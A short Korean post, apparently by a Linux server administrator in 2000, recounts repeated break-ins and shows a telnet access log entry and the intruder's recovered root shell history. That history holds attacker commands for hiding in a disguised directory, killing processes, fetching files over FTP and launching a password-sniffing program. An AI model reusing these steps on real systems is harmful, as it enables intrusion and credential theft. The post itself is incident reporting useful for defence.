여러번 해킹 당했는데요.
하드포멧안하고 비밀번호도 안바꾸었더니 다시 들어왔습니다..
므흐~..
tcp 스캔 프로그램으로 모든 사용자 비밀번호와 사용기록을
tcp.log에 저장하는 프로그램을 돌렸더군요..허..
해커가 까먹었는지 전에는 root의 .bash_history을 null바꾸더니
이번에는 바꾸지 않아 root의 사용기록이 남아있었습니다.
* 접속기록
Access Time : Thu Sep 7 07:12:19 KST 2000
Access client host address : 194.102.235.145
Access client information : BoxYneT.Repka.Ro
The daemon process name : in.telnetd
Access client host name(or IP) : BoxYneT.Repka.Ro
Access client host name : BoxYneT.Repka.Ro
The daemon process id : 20846
Access client user name : unknown
* root사용기록
telnet naoki.cyberhippie.net
telnet naoki.cyberhippie.net
exit
telnet noki.cyberhippie.net
telnet naoki.cyberhippie/net
telnet naoki.cyberhippie.net
cd "/usr/doc/.. /"
ls -lsa
./list .log
killall -9 kill
./kill &
killall -9 shitzu
locate shitzu
pico /dev/dsx
ps x
w
locate sn
ftp ftp.xoom.com
chmod +x sn
./sn &
exit